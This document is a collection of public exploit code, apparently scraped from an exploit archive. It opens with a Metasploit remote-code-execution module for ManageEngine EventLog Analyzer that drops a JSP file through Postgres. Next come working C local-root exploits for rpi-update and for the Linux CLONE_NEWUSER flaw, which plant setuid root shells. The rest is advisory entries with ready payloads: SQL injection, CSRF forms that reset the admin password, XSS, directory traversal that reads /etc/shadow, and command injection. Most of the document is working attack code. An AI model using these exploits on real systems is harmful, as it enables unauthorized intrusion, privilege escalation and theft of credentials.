##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
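class Metasploit3 < Msf::Exploit::Remote
  # Manual rank: the JSP is dropped through hard-coded relative paths that
  # were only verified against the single listed target.
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine EventLog Analyzer Remote Code Execution',
      'Description'    => %q{
        This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6
        build 10060 and previous versions. Every authenticated user, including the default "guest"
        account can execute SQL queries directly on the underlying Postgres database server. The
        queries are executed as the "postgres" user which has full privileges and thus is able to
        write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM
        privileges on the web server. This module has been tested successfully on ManageEngine
        EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '38173']
        ],
      'Platform'       => ['win'],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 11 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8400),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
        OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ])
      ], self.class)
  end

  # Base path of the web application (TARGETURI); every request hangs off it.
  def uri
    target_uri.path
  end

  # Fingerprint only: looks for the product name on the login page. The
  # build number is not parsed, so Detected does not prove the install is
  # within the vulnerable range.
  def check
    vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'event', 'index3.do')
    })

    # No response means the service was not reachable; returning Safe would
    # wrongly assert that the host was checked and is not affected.
    return Exploit::CheckCode::Unknown unless res

    if res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer')
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Runs +query+ through the application's runQuery.do endpoint with an
  # authenticated session (+cookies+). Returns the raw response and aborts
  # the module on anything but HTTP 200.
  def sql_query(cookies, query)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'event', 'runQuery.do'),
      'cookie'    => cookies,
      'vars_post' => {
        'execute' => 'true',
        'query'   => query
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!")
    end

    res
  end

  # Builds a JSP stager that base64-decodes +cmd+ and runs it through
  # "cmd.exe /c". Identifier names are randomised to vary the dropped file.
  # sun.misc.BASE64Decoder is a JDK-internal class (removed in Java 9+); this
  # assumes the JRE the target runs on is old enough -- TODO confirm.
  def generate_jsp_payload(cmd)
    decoder       = rand_text_alpha(4 + rand(32 - 4))
    decoded_bytes = rand_text_alpha(4 + rand(32 - 4))
    cmd_array     = rand_text_alpha(4 + rand(32 - 4))

    jsp_code = '<%'
    jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
    jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
    jsp_code << "String [] #{cmd_array} = new String[3];\n"
    jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n"
    jsp_code << "#{cmd_array}[1] = \"/c\";\n"
    jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
    jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n"
    jsp_code << '%>'
    jsp_code
  end

  # Flow: obtain a JSESSIONID, authenticate via j_security_check, follow the
  # redirect to collect the session cookies, write the JSP to the webapp
  # directory through Postgres large objects, then request it.
  def exploit
    print_status("#{peer} - Retrieving JSESSION ID")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'event', 'index3.do')
    })

    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
      jsessionid = Regexp.last_match(1)
      print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
    end

    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"),
      'vars_post' => {
        'forChecking' => 'null',
        'j_username'  => datastore['USERNAME'],
        'j_password'  => datastore['PASSWORD'],
        'domains'     => "Local Authentication\r\n",
        'loginButton' => 'Login',
        'optionValue' => 'hide'
      }
    })

    # A successful login answers with a redirect; anything else is treated
    # as a failed login.
    if res && res.code == 302
      redirect = URI(res.headers['Location'])
      print_status("#{peer} - Location is [ #{redirect} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
    end

    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri'    => redirect.to_s,
      'method' => 'GET'
    })

    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
      cookies = res.get_cookies
      print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
    else
      fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
    end

    jsp_name    = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
    cmd         = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    # Single-line base64 so it fits inside the SQL string literal below.
    jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')

    print_status("#{peer} - Executing SQL queries")

    # Large object id -1 is used so that objects belonging to the application
    # are never touched; unlink first in case a previous run left it behind.
    sql_query(cookies, 'SELECT lo_unlink(-1)')
    result = sql_query(cookies, 'SELECT lo_create(-1)')
    if result.body =~ /menuItemRow\">([0-9]+)/
      loid = Regexp.last_match(1)
    else
      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
    end

    # The application rejects queries that start with INSERT/UPDATE/DELETE
    # etc., so the statement is prefixed with a harmless SELECT. (The original
    # comment attributed this filter to OpManager, presumably copied from a
    # sibling module.) The /**/ separators are presumably there to defeat a
    # keyword match as well.
    select_random = rand_text_numeric(2 + rand(6 - 2))
    sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
    sql_query(cookies, sql)

    # Export the large object as a JSP into the webapp directory. This path is
    # relative to the Postgres server's working directory, while the cleanup
    # path registered below is relative to the payload session's working
    # directory; the two differ in depth. NOTE(review): confirm the dropped
    # JSP is actually removed on the tested target.
    sql_query(cookies, "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');")
    sql_query(cookies, 'SELECT lo_unlink(-1)')
    register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}")

    print_status("#{peer} - Executing JSP payload")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, jsp_name)
    })

    # A 200 is taken as evidence that the JSP was written and executed.
    unless res && res.code == 200
      # res is nil on a transport failure; the original dereferenced it
      # unconditionally and died with NoMethodError instead of fail_with.
      print_status("#{res.code}\n#{res.body}") if res
      fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!")
    end
  end
end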
source: https://www.securityfocus.com/bid/58271/info
Plogger is prone to the following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:
1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A cross-site request forgery vulnerability
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
+---+[ Feedback.php Sqli ]+---+
The entries_per_page parameter of plog-feedback.php is injectable:
http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
Proof of concept (vulnerable code path: the parameter is stored in the session and concatenated into the LIMIT clause without sanitization):
if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);
+---+[ CSRF In Admin Panel ]+---+
Plogger does not use any anti-CSRF token or nonce parameter, so every action in the admin panel is vulnerable to CSRF.
+---+[ XSS ]+---+
There are multiple XSS issues in Plogger, for example when editing a comment inside the admin panel: comments are filtered for normal users but not for the admin.
Because the admin panel has no CSRF protection, an attacker can edit a comment via CSRF and replace it with any XSS vector.
XSS
http://www.example.com/plogger/plog-admin/plog-feedback.php
Edit a comment with any XSS vector, or do it via CSRF.
Upload a file and set its name to any XSS vector:
http://www.example.com/plogger/plog-admin/plog-upload.php
This can be exploited in several ways, for example:
CSRF + SQL injection inside the admin panel (described above), or
CSRF + XSS via the edit-comment form:
<html>
<head>
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
Another XSS
http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit the caption to an XSS vector inside the admin panel, or again via CSRF + XSS:
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
CSRF Admin Password Reset And XSS
plog-options.php
<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
source: https://www.securityfocus.com/bid/58285/info
The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Uploader 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E
source: https://www.securityfocus.com/bid/58290/info
Foscam is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
GET //../proc/kcore HTTP/1.0
// source: https://www.securityfocus.com/bid/58292/info
rpi-update is prone to an insecure temporary-file-handling vulnerability and a security-bypass vulnerability.
An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application, bypass certain security restrictions, and perform unauthorized actions. This may aid in further attacks.
/*Local root exploit for rpi-update on raspberry Pi.
Vulnerability discovered by Technion, technion@lolware.net
https://github.com/Hexxeh/rpi-update/
larry@pih0le:~$ ./rpix updateScript.sh
[*] Launching attack against "updateScript.sh"
[+] Creating evil script (/tmp/evil)
[+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
[+] Initialize inotify on /tmp/updateScript.sh
[+] Waiting for root to change perms on "updateScript.sh"
[+] Opening root shell (/tmp/sh)
# <-- Yay!
Larry W. Cashdollar
http://vapid.dhs.org
@_larry0
Greets to Vladz.
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
/*Create a small c program to pop us a root shell*/
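int create_nasty_shell(char *file) {
  /* Shell script that, once run by root, compiles a setuid(0)+execve("/bin/sh")
   * stub and installs it setuid-root at /tmp/sh. That binary is left on disk
   * afterwards; remove it by hand when done. */
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
            "chmod 4755 /tmp/sh;\n";
  size_t len = strlen(s);
  /* O_TRUNC added: without it a longer leftover /tmp/evil from an earlier
   * run would keep stale trailing bytes after our script. */
  int fd = open(file, O_CREAT|O_RDWR|O_TRUNC, S_IRWXU|S_IRWXG|S_IRWXO);

  if (fd < 0) {
    perror("[-] open");
    return -1;
  }
  if (write(fd, s, len) != (ssize_t)len) {
    perror("[-] write");
    close(fd);
    return -1;
  }
  close(fd);
  return 0;
}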
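int main(int argc, char **argv) {
  int fd, wd;
  char *targetpath, *cmd,
       *evilsh = "/tmp/evil", *trash = "/tmp/trash";
  /* inotify returns whole struct inotify_event records; since 2.6.21 a read()
   * into a buffer smaller than one record fails with EINVAL once an event
   * arrives instead of returning it (the original used a 1-byte buffer and
   * only worked because the failing read still acted as a wake-up). */
  char evbuf[sizeof(struct inotify_event) + 256];
  size_t pathlen, cmdlen;

  if (argc < 2) {
    printf("Usage: %s <target file> \n", argv[0]);
    return 1;
  }
  printf("[*] Launching attack against \"%s\"\n", argv[1]);
  printf("[+] Creating evil script (/tmp/evil)\n");
  if (create_nasty_shell(evilsh) != 0)
    return 1;

  /* The original sized these with sizeof(argv[1]) -- the size of a pointer,
   * not the string -- and a fixed 32 bytes, so even the demo name
   * "updateScript.sh" overflowed the command buffer. Size from the input. */
  pathlen = strlen("/tmp/") + strlen(argv[1]) + 1;
  cmdlen = strlen("/usr/bin/touch ") + pathlen;
  targetpath = malloc(pathlen);
  cmd = malloc(cmdlen);
  if (targetpath == NULL || cmd == NULL) {
    perror("[-] malloc");
    return 1;
  }
  snprintf(targetpath, pathlen, "/tmp/%s", argv[1]);
  /* argv[1] is interpolated into a shell command line; it is the operator's
   * own input here, but it must be quoted if ever fed from untrusted data. */
  snprintf(cmd, cmdlen, "/usr/bin/touch %s", targetpath);
  printf("[+] Creating target file (%s)\n", cmd);
  system(cmd);

  printf("[+] Initialize inotify on %s\n", targetpath);
  fd = inotify_init();
  if (fd < 0) {
    perror("[-] inotify_init");
    return 1;
  }
  wd = inotify_add_watch(fd, targetpath, IN_MODIFY);
  if (wd < 0) {
    perror("[-] inotify_add_watch");
    return 1;
  }
  printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
  /* Block until root modifies the file, then swap our script in before it is
   * used. The raw syscalls are kept from the original, presumably to keep
   * the race window as short as possible. */
  syscall(SYS_read, fd, evbuf, sizeof(evbuf));
  syscall(SYS_rename, targetpath, trash);
  syscall(SYS_rename, evilsh, targetpath);
  inotify_rm_watch(fd, wd);
  close(fd);

  printf("[+] Opening root shell (/tmp/sh)\n");
  sleep(2);
  /* /tmp/sh is the setuid-root stub dropped by the evil script; it remains on
   * disk afterwards unless removed by hand. */
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  free(targetpath);
  free(cmd);
  return 0;
}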
source: https://www.securityfocus.com/bid/58293/info
HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected.
http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null
source: https://www.securityfocus.com/bid/58418/info
Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/public/error.php?warning=<XSS injection>
source: https://www.securityfocus.com/bid/58508/info
Petite Annonce is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script>
source: https://www.securityfocus.com/bid/58476/info
Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including:
1. Multiple local file-include vulnerabilities
2. A security-bypass vulnerability
3. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to bypass certain security restrictions to perform unauthorized actions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
Cisco Video Surveillance Operations Manager 6.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
/*
source: https://www.securityfocus.com/bid/58478/info
Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain kernel privileges, which will aid in further attacks.
*/
/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
*
* Dedicated to: Locke Locke Locke Locke Locke Locke Locke!
*
* This exploit was made on the 13.3.13.
*
* (C) 2013 Sebastian Krahmer
*
* We are so 90's, but we do 2013 xSports.
*
* Must be compiled static:
*
* stealth@linux-czfh:~> cc -Wall clown-newuser.c -static
* stealth@linux-czfh:~> ./a.out
* [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
*
* [+] Found myself: '/home/stealth/a.out'
* [*] Parent waiting for boomsh to appear ...
* [*] Setting up chroot ...
* [+] Done.
* [*] Cloning evil child ...
* [+] Done.
* [*] Creating UID mapping ...
* [+] Done.
* [+] Yay! euid=0 uid=1000
* linux-czfh:/home/stealth # grep bin /etc/shadow
* bin:*:15288::::::
* linux-czfh:/home/stealth #
*
*/
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
int go[2];
char child_stack[1<<20];
extern char **environ;
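/* Print msg with the current errno text and exit with errno as the status.
 * errno is captured first because the C standard does not promise that
 * perror() leaves it untouched. */
void die(const char *msg)
{
	int saved_errno = errno;

	perror(msg);
	exit(saved_errno);
}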
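/* Entry point of the CLONE_NEWUSER|CLONE_FS helper. Waits until the parent
 * has written our uid_map, becomes uid 0 inside the new namespace, and
 * chroots into ./chroot. Because the filesystem context is shared
 * (CLONE_FS), the chroot also re-roots the parent, which still lives in the
 * initial user namespace. */
int child(void *arg)
{
	char c;

	(void)arg;
	close(go[1]);
	/* Wait for the parent's "go" byte: the mapping must exist before
	 * setuid(0) can succeed in this namespace. */
	if (read(go[0], &c, 1) != 1)
		die("[-] read");
	/* uid 0 here maps to our real uid (mapping "0 <uid> 1"), so this is
	 * permitted; the original ignored a failure and chrooted anyway. */
	if (setuid(0) < 0)
		die("[-] setuid");
	if (chdir("chroot") < 0)
		die("[-] chdir");
	if (chroot(".") < 0)
		die("[-] chroot");
	return 0;
}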
/* Populate ./chroot with the two files su needs to be started inside it:
 * /bin/su itself, and our own binary standing in for the x86-64 dynamic
 * loader (see the header comment: su then "runs" us with euid 0). */
int setup_chroot(const char *me)
{
	static const char *dirs[] = { "chroot", "chroot/lib64", "chroot/bin" };
	size_t i;

	/* Directory creation is best-effort; EEXIST on a re-run is fine. */
	for (i = 0; i < sizeof(dirs) / sizeof(dirs[0]); ++i)
		mkdir(dirs[i], 0755);

	/* Hard links, so both sources must be on the same filesystem as the
	 * current directory (link(2) fails with EXDEV otherwise). */
	if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
		die("[-] link");
	if (link("/bin/su", "chroot/bin/su") < 0)
		die("[-] link");
	return 0;
}
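/* The program re-executes itself in several roles, selected by euid/argc:
 *   stage 1  (euid != 0, parent of fork): wait for our binary to turn
 *            root-owned, then re-exec it with one argument;
 *   stage 2  (euid != 0, child of fork): build the chroot, clone the
 *            CLONE_NEWUSER helper, write its uid_map, then exec su;
 *   stage 3  (euid == 0, argc == 1): running as su's "loader" inside the
 *            chroot -- make the hard-linked binary setuid root;
 *   stage 4  (euid == 0, argc == 2): the setuid-root re-exec -- drop to a
 *            root shell.
 * NOTE: stage 3 turns this very binary (via the hard link) into a
 * setuid-root file; remove it after use. */
int main(int argc, char *argv[])
{
	char *su[] = {"/bin/su", NULL};
	char *sh[] = {"/bin/bash", NULL};
	char me[256], *mee[] = {me, "1", NULL};
	char uidmap[128], map_file[128];
	pid_t pid;
	struct stat st;
	int fd;

	if (geteuid() == 0 && argc == 1) {
		/* stage 3: inside the chroot, cwd is its root */
		printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
		chown("lib64/ld-linux-x86-64.so.2", 0, 0);
		chmod("lib64/ld-linux-x86-64.so.2", 04755);
		exit(0);
	} else if (geteuid() == 0) {
		/* stage 4: outside, started setuid by the waiting parent */
		setuid(0);
		execve(*sh, sh, environ);
		die("[-] execve");
	}

	printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");

	/* Paths longer than 255 bytes are truncated; fine for the demo. */
	memset(me, 0, sizeof(me));
	if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
		die("[-] readlink");
	printf("[+] Found myself: '%s'\n", me);

	pid = fork();
	if (pid < 0)
		die("[-] fork");
	if (pid > 0) {
		/* stage 1. The original ignored stat() failures and tested a
		 * possibly stale st_uid; require a successful stat first. */
		printf("[*] Parent waiting for boomsh to appear ...\n");
		for (;;) {
			if (stat(me, &st) == 0 && st.st_uid == 0)
				break;
			usleep(1000);
		}
		execve(me, mee, environ);
		die("[-] execve");
	}

	/* stage 2 */
	printf("[*] Setting up chroot ...\n");
	setup_chroot(me);

	printf("[+] Done.\n[*] Cloning evil child ...\n");
	if (pipe(go) < 0)
		die("[-] pipe");
	/* Stack grows down, so pass the top of the buffer. */
	pid = clone(child, child_stack + sizeof(child_stack),
	            CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
	if (pid == -1)
		die("[-] clone");

	printf("[+] Done.\n[*] Creating UID mapping ...\n");
	snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
	if ((fd = open(map_file, O_RDWR)) < 0)
		die("[-] open");
	/* Map uid 0 inside the new namespace onto our real uid. */
	snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
	if (write(fd, uidmap, strlen(uidmap)) < 0)
		die("[-] write");
	close(fd);
	printf("[+] Done.\n");

	/* Release the helper; it setuid(0)s and chroots us both (CLONE_FS). */
	close(go[0]);
	if (write(go[1], "X", 1) != 1)
		die("[-] write");
	waitpid(pid, NULL, 0);

	/* Now inside the chroot, where lib64/ld-linux-x86-64.so.2 is our own
	 * binary: su runs it as its loader with euid 0 (stage 3). */
	execve(*su, su, NULL);
	die("[-] execve");
	return -1;
}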
source: https://www.securityfocus.com/bid/58463/info
QlikView is prone to a remote integer-overflow vulnerability.
Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
QlikView 11.00 SR2 is vulnerable; other versions may also be affected.
Vulnerability details:
----------------------
The .qvw file is divided into several sections with a specified delimiter.
Among others, there is a parameter which is responsible for defining the
section length. On the hex listing below it's the DWORD A4 00 00 00 (address
315EF)
000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47
If for any reason the value is bigger than the actual size of the section, the
error is caught by a C++ exception handler and a "Document failed to load" message
is shown. The check can be seen here:
.text:00D6BD66 mov eax, [edi+28h]
.text:00D6BD69 mov ebx, [eax] ; here is the length parameter
.text:00D6BD6B add eax, 4
.text:00D6BD6E mov [edi+28h], eax
.text:00D6BD71 cmp ebx, [ebp+var_14]
.text:00D6BD74 jg loc_D6BBAC ; check if the parameter value
is bigger than actual length
However, the comparison is signed and the value is never checked for being
less than zero. In other words, if an attacker supplies a DWORD of 0x80000000 or
larger, the jump is not taken (the value is treated as negative) and the bounds
check is bypassed -- a signedness error that leads to the integer overflow. After
that, the length parameter is used as the DstSize argument to CArchive::Read:
.text:00D6BD7A mov eax, [ebp+Dst]
.text:00D6BD7D push ebx ; DstSize
.text:00D6BD7E push eax ; Dst
.text:00D6BD7F mov ecx, edi
.text:00D6BD81 call ?Read@CArchive@@QAEIPAXI@Z ; CArchive::Read(void *,uint)
A large amount of data is read. It is used later to fill the created Archive
whose size is 0x8000:
.text:00B26207 push 0
.text:00B26209 push 8000h
.text:00B2620E push 1
.text:00B26210 lea eax, [ebp+var_60]
.text:00B26213 push eax
.text:00B26214 lea ecx, [ebp+var_A8]
.text:00B2621A call ??0CArchive@@QAE@PAVCFile@@IHPAX@Z ; CArchive::CArchive(CFile *,uint,int,void *)
This results in the controlled address being overwritten with the controlled
value.
.text:009F3092 mov ecx, [esi]
.text:009F3094 mov edx, [esi+4]
.text:009F3097 mov [ecx+4], edx ; here the error occurs;
.text:009F3097 ; trying to write at non-existing address
A debugger extract showing the occurrence of the error is presented below.
eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
Qv+0x5f3097:
01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????
source: https://www.securityfocus.com/bid/58450/info
fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
fastreader 1.0.8 is affected; other versions may also be vulnerable.
The following example URI demonstrates the issue; the semicolons presumably terminate the shell command the application builds from the URI, so `id` is executed on the server:
http://www.g;id;.com
source: https://www.securityfocus.com/bid/58432/info
PHPBoost is prone to an information disclosure vulnerability and an arbitrary file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit these issues to upload arbitrary files in the context of the web server process or gain access to sensitive information that may aid in further attacks.
PHPBoost 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/phpboost/user/?url=/../../KedAns
Source: https://code.google.com/p/google-security-research/issues/detail?id=546
